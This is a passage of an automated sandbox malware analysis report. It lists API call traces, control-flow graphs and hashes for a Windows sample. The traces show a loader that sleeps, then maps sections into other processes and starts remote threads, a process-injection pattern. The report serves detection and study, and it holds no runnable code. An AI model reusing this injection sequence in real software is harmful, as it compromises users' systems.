                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                        • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                        • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                        • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 492 4018f1-40194b call 401193 Sleep call 40141f 502 40195a-4019a5 call 401193 492->502 503 40194d-401955 call 401514 492->503 503->502
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                        • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                        • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                        • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                        • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                        • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                        • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02CDF798
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1792278239.0000000002CDC000.00000040.00000020.00020000.00000000.sdmp, Offset: 02CDC000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2cdc000_3sfCdeA1H2.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                        • Instruction ID: edd75fea8103a4bc0f974bee35ed1a7a9a5edca2f6d5c6f9f892eb927b147335
                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                        • Instruction Fuzzy Hash: 13113C79A00208EFDB01DF98C985E98BBF5BF08750F068094FA499B361D371EA50EF90
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                        • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                        • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                        • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                        APIs
                                        • LocalAlloc.KERNELBASE(00000000,02B1AF6C,00417344), ref: 00416CD8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790582710.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_40b000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID: AllocLocal
                                        • String ID:
                                        • API String ID: 3494564517-0
                                        • Opcode ID: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
                                        • Instruction ID: 2f0f8130ca7dcaba0d5f32f79dbe0382024477fd9a1010909bb1960a3d491594
                                        • Opcode Fuzzy Hash: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
                                        • Instruction Fuzzy Hash: C0B092F1D862049BD200CB50E804B603B64A309642F404414F504C2180DB302410CA10
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1792124239.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2c90000_3sfCdeA1H2.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: .$GetProcAddress.$l
                                        • API String ID: 0-2784972518
                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                        • Instruction ID: 1cffc4cf65e29db40dd3a073ac82601a920c644e98e4645d142af314c4797b14
                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                        • Instruction Fuzzy Hash: 8D3139B6900609DFDB10CF99C884AAEBBF9FF48728F15404AD841AB310D771EA45CFA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1792278239.0000000002CDC000.00000040.00000020.00020000.00000000.sdmp, Offset: 02CDC000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2cdc000_3sfCdeA1H2.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                        • Instruction ID: 259ca4fbea10e822bc8b2307fec0fb864e244d29fcf165fe2cdca85710027db8
                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                        • Instruction Fuzzy Hash: 9D117C72340100AFDB54DE55DCD0FA673EAFB89220B1A8169EE09CB715D779E842CB60
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                        • Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
                                        • Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                        • Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                        • Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
                                        • Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                        • Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1792124239.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2c90000_3sfCdeA1H2.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                        • Instruction ID: 9d41ddb34d593106110ca82f8fe8c3ae5447f04cd077c60ecede07d25a12fcc3
                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                        • Instruction Fuzzy Hash: 7501A277A106048FDF21CF24C808BAA33F9EBC6216F4544B5D90A97281E774AA41CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                        • Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
                                        • Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                        • Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                        • Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
                                        • Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                        • Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                        • Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
                                        • Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                        • Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                        • Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
                                        • Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                        • Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B
                                        APIs
                                        • BuildCommDCBA.KERNEL32(00000000,?), ref: 00416F01
                                        • WritePrivateProfileStringW.KERNEL32(00419450,004193D0,00419394,00419340), ref: 00416F25
                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00416F2D
                                        • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00416F6D
                                        • GetComputerNameW.KERNEL32(?,?), ref: 00416F81
                                        • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416F8F
                                        • OpenJobObjectA.KERNEL32(00000000,00000000,004194A0), ref: 00416F9E
                                        • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00416FAF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790582710.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_40b000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
                                        • String ID: -
                                        • API String ID: 113859268-2547889144
                                        • Opcode ID: 8379e1a95e74a92e796e3a0bb335547fc287d018873478223eb4169182214a27
                                        • Instruction ID: 8f7d67f1928f44ffaa59fc403b52841f5e51a7ccc1cf3445b47acfe1213c342b
                                        • Opcode Fuzzy Hash: 8379e1a95e74a92e796e3a0bb335547fc287d018873478223eb4169182214a27
                                        • Instruction Fuzzy Hash: DA21DB31A4434CABD7109FA4DC49BD97B74EB0C711F1241A9F749AA1C0CAB459C9CB5D
                                        APIs
                                        • QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00417024
                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041703F
                                        • HeapDestroy.KERNEL32(00000000), ref: 0041705E
                                        • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 0041706D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790582710.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_40b000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                        • String ID:
                                        • API String ID: 4159173863-0
                                        • Opcode ID: 3dede072327e3f349e6cf8f7759a4dd28f8ba9426654f24352229ba18d52890c
                                        • Instruction ID: 368a894d8ff72c9ccf33279a8f005ab713ac243706c75ee28622bc71169ac13e
                                        • Opcode Fuzzy Hash: 3dede072327e3f349e6cf8f7759a4dd28f8ba9426654f24352229ba18d52890c
                                        • Instruction Fuzzy Hash: CA01D4B5A403089BD720EB64EC45BEA3BB8EB0C742F40002AE709A7281DF746984CF59

                                        Execution Graph

                                        Execution Coverage:9.5%
                                        Dynamic/Decrypted Code Coverage:28.7%
                                        Signature Coverage:0%
                                        Total number of Nodes:171
                                        Total number of Limit Nodes:5
                                        execution_graph 3411 402e40 3413 402e37 3411->3413 3414 402edf 3413->3414 3415 4018e6 3413->3415 3416 4018f5 3415->3416 3417 40192e Sleep 3416->3417 3418 401949 3417->3418 3420 40195a 3418->3420 3421 401514 3418->3421 3420->3414 3422 401524 3421->3422 3423 4016e0 3422->3423 3424 4015c4 NtDuplicateObject 3422->3424 3423->3420 3424->3423 3425 4015e1 NtCreateSection 3424->3425 3426 401661 NtCreateSection 3425->3426 3427 401607 NtMapViewOfSection 3425->3427 3426->3423 3429 40168d 3426->3429 3427->3426 3428 40162a NtMapViewOfSection 3427->3428 3428->3426 3430 401648 3428->3430 3429->3423 3431 401697 NtMapViewOfSection 3429->3431 3430->3426 3431->3423 3432 4016be NtMapViewOfSection 3431->3432 3432->3423 3433 417460 3436 417090 3433->3436 3435 417465 3437 41709d 3436->3437 3438 417157 InterlockedExchangeAdd ReadConsoleA FindAtomW GetConsoleFontSize SearchPathW 3437->3438 3439 41729e 3437->3439 3441 4171bb 7 API calls 3438->3441 3440 4172b0 SetCommState 3439->3440 3446 4172c9 3439->3446 3440->3439 3442 417270 GetBoundsRect 3441->3442 3443 417279 3441->3443 3442->3443 3444 417282 OpenFileMappingA 3443->3444 3445 41728f 3443->3445 3444->3445 3445->3439 3447 4172d2 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA 3446->3447 3449 417307 3446->3449 3447->3449 3458 416cd0 LocalAlloc 3449->3458 3452 417344 LoadLibraryA 3459 416d00 GetModuleHandleW GetProcAddress VirtualProtect 3452->3459 3453 41739d 3460 416ff0 3453->3460 3455 4173a2 3456 4173d9 InterlockedDecrement 3455->3456 3457 4173ef 3455->3457 3456->3455 3457->3435 3458->3452 3459->3453 3461 417019 QueryDosDeviceA 3460->3461 3462 41702a 3460->3462 3461->3462 3471 416e90 3462->3471 3465 417045 3474 416ed0 3465->3474 3466 41703d FreeEnvironmentStringsA 3466->3465 3469 41705c HeapDestroy GetNumaProcessorNode 3470 417073 3469->3470 3470->3455 3472 416ea1 FatalAppExitA GetModuleHandleW 3471->3472 3473 416eb3 3471->3473 3472->3473 3473->3465 3473->3466 3475 416edd 3474->3475 3476 416f09 3475->3476 3477 416ef8 BuildCommDCBA 3475->3477 3478 416f11 WritePrivateProfileStringW FreeEnvironmentStringsA 3476->3478 3479 416f33 3476->3479 3477->3479 3478->3479 3480 416fba 3479->3480 3482 416f69 GetNumaAvailableMemoryNode GetComputerNameW SetCalendarInfoA OpenJobObjectA GetShortPathNameW 3479->3482 3483 416ec0 3479->3483 3480->3469 3480->3470 3482->3479 3486 416e50 3483->3486 3487 416e79 3486->3487 3488 416e6c SetEvent 3486->3488 3487->3479 3488->3487 3587 401542 3588 40153b 3587->3588 3589 4015c4 NtDuplicateObject 3588->3589 3590 4016e0 3588->3590 3589->3590 3591 4015e1 NtCreateSection 3589->3591 3592 401661 NtCreateSection 3591->3592 3593 401607 NtMapViewOfSection 3591->3593 3592->3590 3595 40168d 3592->3595 3593->3592 3594 40162a NtMapViewOfSection 3593->3594 3594->3592 3596 401648 3594->3596 3595->3590 3597 401697 NtMapViewOfSection 3595->3597 3596->3592 3597->3590 3598 4016be NtMapViewOfSection 3597->3598 3598->3590 3623 417363 3624 417370 LoadLibraryA 3623->3624 3632 416d00 GetModuleHandleW GetProcAddress VirtualProtect 3624->3632 3627 41739d 3628 416ff0 15 API calls 3627->3628 3629 4173a2 3628->3629 3630 4173d9 InterlockedDecrement 3629->3630 3631 4173ef 3629->3631 3630->3629 3632->3627 3489 2c60461 3492 2c60470 3489->3492 3493 2c6047f 3492->3493 3496 2c60c10 3493->3496 3497 2c60c2b 3496->3497 3498 2c60c34 CreateToolhelp32Snapshot 3497->3498 3499 2c60c50 Module32First 3497->3499 3498->3497 3498->3499 3500 2c6046f 3499->3500 3501 2c60c5f 3499->3501 3503 2c608cf 3501->3503 3504 2c608fa 3503->3504 3505 2c60943 3504->3505 3506 2c6090b VirtualAlloc 3504->3506 3505->3505 3506->3505 3511 477003c 3512 4770049 3511->3512 3524 4770e0f SetErrorMode SetErrorMode 3512->3524 3517 4770265 3518 47702ce VirtualProtect 3517->3518 3520 477030b 3518->3520 3519 4770439 VirtualFree 3523 47704be LoadLibraryA 3519->3523 3520->3519 3522 47708c7 3523->3522 3525 4770223 3524->3525 3526 4770d90 3525->3526 3527 4770dad 3526->3527 3528 4770dbb GetPEB 3527->3528 3529 4770238 VirtualAlloc 3527->3529 3528->3529 3529->3517 3656 402dd0 3658 402ddc 3656->3658 3657 4018e6 8 API calls 3659 402edf 3657->3659 3658->3657 3658->3659 3568 4018f1 3569 4018f6 3568->3569 3570 40192e Sleep 3569->3570 3571 401949 3570->3571 3572 401514 7 API calls 3571->3572 3573 40195a 3571->3573 3572->3573 3542 4770005 3547 477092b GetPEB 3542->3547 3544 4770030 3549 477003c 3544->3549 3548 4770972 3547->3548 3548->3544 3550 4770049 3549->3550 3551 4770e0f 2 API calls 3550->3551 3552 4770223 3551->3552 3553 4770d90 GetPEB 3552->3553 3554 4770238 VirtualAlloc 3553->3554 3555 4770265 3554->3555 3556 47702ce VirtualProtect 3555->3556 3558 477030b 3556->3558 3557 4770439 VirtualFree 3561 47704be LoadLibraryA 3557->3561 3558->3557 3560 47708c7 3561->3560 3643 401915 3644 4018c6 3643->3644 3645 40191a 3643->3645 3646 40192e Sleep 3645->3646 3647 401949 3646->3647 3648 401514 7 API calls 3647->3648 3649 40195a 3647->3649 3648->3649 3562 4770001 3563 4770005 3562->3563 3564 477092b GetPEB 3563->3564 3565 4770030 3564->3565 3566 477003c 7 API calls 3565->3566 3567 4770038 3566->3567 3507 402f97 3508 4030ee 3507->3508 3509 402fc1 3507->3509 3509->3508 3510 40307c RtlCreateUserThread NtTerminateProcess 3509->3510 3510->3508 3633 402d7b 3634 402d38 3633->3634 3634->3633 3635 4018e6 8 API calls 3634->3635 3636 402dc7 3634->3636 3635->3636 3574 4014fe 3575 401506 3574->3575 3576 401531 3574->3576 3577 4015c4 NtDuplicateObject 3576->3577 3586 4016e0 3576->3586 3578 4015e1 NtCreateSection 3577->3578 3577->3586 3579 401661 NtCreateSection 3578->3579 3580 401607 NtMapViewOfSection 3578->3580 3582 40168d 3579->3582 3579->3586 3580->3579 3581 40162a NtMapViewOfSection 3580->3581 3581->3579 3583 401648 3581->3583 3584 401697 NtMapViewOfSection 3582->3584 3582->3586 3583->3579 3585 4016be NtMapViewOfSection 3584->3585 3584->3586 3585->3586

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 155 401514-401533 157 401524-40152f 155->157 158 401536-40156e call 401193 155->158 157->158 167 401570 158->167 168 401573-401578 158->168 167->168 170 401898-4018a0 168->170 171 40157e-40158f 168->171 170->168 176 4018a5-4018b7 170->176 174 401595-4015be 171->174 175 401896 171->175 174->175 185 4015c4-4015db NtDuplicateObject 174->185 175->176 182 4018c5 176->182 183 4018bc-4018e3 call 401193 176->183 182->183 185->175 187 4015e1-401605 NtCreateSection 185->187 189 401661-401687 NtCreateSection 187->189 190 401607-401628 NtMapViewOfSection 187->190 189->175 193 40168d-401691 189->193 190->189 191 40162a-401646 NtMapViewOfSection 190->191 191->189 194 401648-40165e 191->194 193->175 195 401697-4016b8 NtMapViewOfSection 193->195 194->189 195->175 197 4016be-4016da NtMapViewOfSection 195->197 197->175 200 4016e0 call 4016e5 197->200
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd
                                        Similarity
                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                        • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                        • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                        • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 202 4014fe-401503 203 401531-40156e call 401193 202->203 204 401506-401511 202->204 214 401570 203->214 215 401573-401578 203->215 214->215 217 401898-4018a0 215->217 218 40157e-40158f 215->218 217->215 223 4018a5-4018b7 217->223 221 401595-4015be 218->221 222 401896 218->222 221->222 232 4015c4-4015db NtDuplicateObject 221->232 222->223 229 4018c5 223->229 230 4018bc-4018e3 call 401193 223->230 229->230 232->222 234 4015e1-401605 NtCreateSection 232->234 236 401661-401687 NtCreateSection 234->236 237 401607-401628 NtMapViewOfSection 234->237 236->222 240 40168d-401691 236->240 237->236 238 40162a-401646 NtMapViewOfSection 237->238 238->236 241 401648-40165e 238->241 240->222 242 401697-4016b8 NtMapViewOfSection 240->242 241->236 242->222 244 4016be-4016da NtMapViewOfSection 242->244 244->222 247 4016e0 call 4016e5 244->247
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectView
                                        • String ID:
                                        • API String ID: 1652636561-0
                                        • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                        • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                        • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                        • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
